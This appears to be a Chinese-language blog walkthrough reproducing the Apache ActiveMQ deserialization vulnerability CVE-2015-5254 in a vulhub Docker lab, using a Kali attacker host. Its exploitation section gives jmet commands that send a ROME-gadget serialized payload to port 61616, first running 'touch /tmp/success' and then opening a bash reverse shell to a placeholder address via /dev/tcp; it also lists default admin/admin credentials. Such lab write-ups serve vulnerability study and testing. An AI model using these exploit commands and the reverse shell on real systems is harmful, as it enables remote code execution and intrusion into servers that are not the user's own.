ActiveMQ反序列化漏洞(CVE-2015-5254)

1.漏洞描述

       Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

2.影响版本

Apache ActiveMQ 5.13.0之前5.x版本

3.漏洞环境搭建

靶机:安装daocker环境centos7: 192.168.210.227

攻击机器:Kali:192.168.210.219

1)漏洞环境在docker中搭建,进入vulhub/activemq/CVE-2015-5254目录

docker-compose up-d

环境运行后,将监听61616和8161两个端口其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口。

2)浏览器访问http://192.168.210.227:8161,环境搭建成功,如下图所示

3)访问管理页面http://192.168.210.227:8161/admin/(默认用户密码为admin/admin)

4.漏洞复现

1)漏洞利用过程如下:

(1)构造(可以使用ysoserial)可执行命令的序列化对象

(2)作为一个消息,发送给目标61616端口

(3)访问的Web管理页面,读取消息,触发漏洞

2)使用jmet进行漏洞利用:

        首先在kali中下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external

3)执行如下命令,目的创建success文件

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.210.227   61616

4)虽然执行命令报后报错,但是该命令依然成功执行。点击ActiveMQ管理页面Queues功能,再点看到生成了消息,点击event,再点生成的Message ID号触发命令

 

5)切换到tmp目录下可看到success文件创建成功

6)按照上述的操作步骤,执行如下命令可成功反弹shell

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/xx.xx.xx.xx/1919>&1" -Yp ROME 192.168.210.227   61616

 

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 终极编程指南 设计师:CSDN官方博客 返回首页